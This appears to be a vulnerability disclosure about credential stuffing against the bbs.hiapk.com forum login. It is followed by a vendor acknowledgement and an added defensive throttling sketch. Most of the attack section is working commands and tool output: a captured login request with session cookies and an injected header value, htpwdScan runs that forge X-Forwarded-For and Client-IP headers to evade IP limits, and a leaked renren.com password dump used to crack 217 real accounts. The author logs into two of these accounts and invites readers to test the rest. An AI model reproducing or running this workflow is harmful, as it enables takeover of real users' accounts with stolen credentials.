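2015-11-24: Details reported to the vendor; waiting for the vendor to respond
2015-11-25: Vendor confirmed; details disclosed to the vendor only
2015-12-05: Details disclosed to core white hats and experts in the relevant field
2015-12-15: Details disclosed to regular white hats
2015-12-25: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public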
duang~~~
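First we register an account to use for testing later. The account and password are as follows.
Registration succeeded.
Now we log in again and capture the request.
Here is the request we captured: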
POST http://bbs.hiapk.com/member.php?mod=logging&action=login&loginsubmit=yes&loginhash=Lx7U6 HTTP/1.1
Host: bbs.hiapk.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://bbs.hiapk.com/member.php?mod=logging&action=login
Cookie: pgv_pvi=6713070778; CNZZDATA30033867=cnzz_eid%3D1649983746-1447089993-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1447995241; CNZZDATA30052228=cnzz_eid%3D1754837298-1447091316-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1447995074; pgv_info=ssi=s1320527239; PHPSESSID=0bnqo1rufjpeht7tlrqndpkf73; g4O_367d_noticeTitle=1; g4O_367d_saltkey=AGE238Ig; g4O_367d_lastvisit=1447994826; g4O_367d_sid=wODMwk; g4O_367d_lastact=1447998461%09connect.php%09check; g4O_367d_sendmail=1; g4O_367d_connect_last_report_time=2015-11-20; g4O_367d_connect_report_times=5; g4O_367d_connect_check_token=1
X-Forwarded-For: x-for';">xxoo<!--
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 156

formhash=050ef89b&referer=http%3A%2F%2Fbbs.hiapk.com%2F&username=woooyun%40qq.com&loginfield=username&password=woooyun&questionid=0&answer=&loginsubmit=true
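Clearly the relevant fields are username and password. OK, we save the data above and then look for a marker of a successful login.
The test file is the login request we just captured.
The xxx file contains the account and password we just registered.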
msl@msl-ubuntu:~/htpwdScan$ ./htpwdScan.py -f=test -database username,password=xxx -regex="(\S+)\s+(\S+)" -err="The username or password" -fip -debug -proxy=192.168.0.187:808
************************************************************
[Parsed Arguments]
{'basic': None, 'checkproxy': False, 'd': None, 'database': 'username,password=xxx', 'debug': True, 'err': [u'The username or password'], 'f': 'test', 'fip': True, 'fsid': None, 'get': False, 'herr': '', 'hsuc': '', 'https': False, 'no302': False, 'nov': False, 'o': '000.Cracked.Passwords.txt', 'proxy': '192.168.0.187:808', 'proxylist': '', 'regex': '(\\S+)\\s+(\\S+)', 'rheader': '', 'rnheader': '', 'rntxt': '', 'rtxt': '', 'sleep': '', 'suc': '', 't': 1, 'u': None}
************************************************************
[Proxy servers loaded]
['192.168.0.187:808']
************************************************************
Job started at 14:26:31
************************************************************
[.]Scan username=woooyun@qq.com&password=woooyun
send: 'POST http://bbs.hiapk.com//member.php?mod=logging&action=login&loginsubmit=yes&loginhash=Lx7U6 HTTP/1.1\r\nHost: bbs.hiapk.com\r\nAccept-Encoding: identity\r\nContent-Length: 148\r\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\nX-Forwarded-For: 189.236.35.171\r\nClient-IP: 189.236.35.171\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0\r\nReferer: http://bbs.hiapk.com/member.php?mod=logging&action=login\r\nCache-Control: no-cache\r\nCookie: pgv_pvi=6713070778; CNZZDATA30033867=cnzz_eid%3D1649983746-1447089993-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1447995241; CNZZDATA30052228=cnzz_eid%3D1754837298-1447091316-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1447995074; pgv_info=ssi=s1320527239; PHPSESSID=0bnqo1rufjpeht7tlrqndpkf73; g4O_367d_noticeTitle=1; g4O_367d_saltkey=AGE238Ig; g4O_367d_lastvisit=1447994826; g4O_367d_sid=wODMwk; g4O_367d_lastact=1447998461%09connect.php%09check; g4O_367d_sendmail=1; g4O_367d_connect_last_report_time=2015-11-20; g4O_367d_connect_report_times=5; g4O_367d_connect_check_token=1\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nusername=woooyun%40qq.com&questionid=0&loginfield=username&referer=http%3A%2F%2Fbbs.hiapk.com%2F&formhash=050ef89b&loginsubmit=true&password=woooyun'
reply: 'HTTP/1.1 200 OK\r\n'
header: Server: nginx/1.0.5
header: Date: Fri, 20 Nov 2015 06:26:41 GMT
header: Content-Type: text/html
header: Transfer-Encoding: chunked
header: Connection: keep-alive
header: Vary: Accept-Encoding
header: X-Powered-By: PHP/5.2.17
header: Vary: User-Agent
[...]
************************************************************
[Response headers and response text]
[...]
$('succeedlocation').innerHTML = '欢迎您回来,A1.安卓人工智能 xxxxxzdsds2,现在将转入登录前页面';
[...]
************************************************************
[+OK]username=woooyun@qq.com&password=woooyun
____________________________________________________________
Task finished at 14:26:45. Cost 13.74 seconds
Cracked 1 item(s) in total.
msl@msl-ubuntu:~/htpwdScan$
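-f loads the request from a file. username,password=xxx needs no explanation. -regex="(\S+)\s+(\S+)" tells the tool how to parse the format of the xxx file. -err is the failure marker. Clearly the returned data does not contain that sentence, so the program treats the login as successful. But that is not enough. We can plainly see that the returned data contains the phrase "欢迎您回来" ("Welcome back"). OK, we use that as the success marker: the program should treat a login as successful only when the returned data contains this phrase. Next, we take out the data that leaked from RR网 (renren.com) N years ago.
As shown in the screenshot above; I won't say how much data there is. The format is "account + space + password". Then we replace -err with -suc, the success marker, and we start. Oh, and there is also the account/password file...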
./htpwdScan.py -f=test -database username,password=renren.com.txt -regex="(\S+)\s+(\S+)" -suc="欢迎您回来" -fip -proxy=192.168.0.187:808
In under a minute (twenty-odd seconds, really), the result is as follows:
217 entries. I won't keep duang-ing.
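Let's log in to check whether they are correct, taking the last few as examples.
I tested two and both could log in; you can test the rest yourselves. The harm is obvious: over a hundred accounts in under a minute. What if criminals ran this for a few hours, especially given how much leaked data is out there now... think about the consequences... rank~~~
Add a more complex CAPTCHA. That is all I can think of... or iris recognition or something would do too.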
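The suggested fix, sketched as server-side throttling that decides when a CAPTCHA is due (an added example, not code from the original report or from Discuz!). It replays a constructed log to show why the limiter must key on the connection's peer address rather than on the X-Forwarded-For / Client-IP headers that the tool's debug output shows it sending; the class and function names, thresholds and sample events are all assumptions.

```python
from collections import defaultdict, deque

class LoginThrottle:
    """Sliding-window limiter: decides before the password is even checked."""

    def __init__(self, window=60, max_users=5, max_fails=5):
        self.window, self.max_users, self.max_fails = window, max_users, max_fails
        self.attempts = defaultdict(deque)  # source key -> (time, username)
        self.failures = defaultdict(deque)  # username   -> (time, source key)

    def _recent(self, queue, now):
        # Drop entries older than the window; every entry starts with its time.
        while queue and now - queue[0][0] > self.window:
            queue.popleft()
        return queue

    def check(self, source, username, now):
        """Return "allow", or "challenge" when a CAPTCHA/lockout step is due."""
        user = username.strip().lower()
        seen = self._recent(self.attempts[source], now)
        seen.append((now, user))
        if len({u for _, u in seen}) > self.max_users:
            return "challenge"      # one source cycling through many accounts
        if len(self._recent(self.failures[user], now)) >= self.max_fails:
            return "challenge"      # one account being guessed repeatedly
        return "allow"

    def record_failure(self, source, username, now):
        self.failures[username.strip().lower()].append((now, source))

def replay(events, trust_forwarded_header):
    """Count challenged requests when keying on the header vs. the socket peer."""
    throttle, challenged = LoginThrottle(), 0
    for t, peer, xff, user, ok in events:
        source = xff if trust_forwarded_header else peer
        if throttle.check(source, user, t) == "challenge":
            challenged += 1
            continue                # the password is not evaluated at all
        if not ok:
            throttle.record_failure(source, user, t)
    return challenged

# Constructed sample: 40 logins in 20 s from one peer (documentation address
# 203.0.113.7), each with a different account and a different forged
# X-Forwarded-For value, followed by one ordinary user on another address.
EVENTS = [(i * 0.5, "203.0.113.7", f"198.51.100.{i + 1}", f"user{i}@example.com", i % 10 == 0)
          for i in range(40)]
EVENTS.append((21.0, "192.0.2.50", "192.0.2.50", "alice@example.com", True))

print(replay(EVENTS, True), replay(EVENTS, False))  # header-keyed vs. peer-keyed
```

If the site sits behind its own reverse proxy, the key should be the address that proxy records for the connection, never a header value the client supplied.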
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-11-25 14:06
Thanks for your support; forwarded to Baidu for fixing.
None yet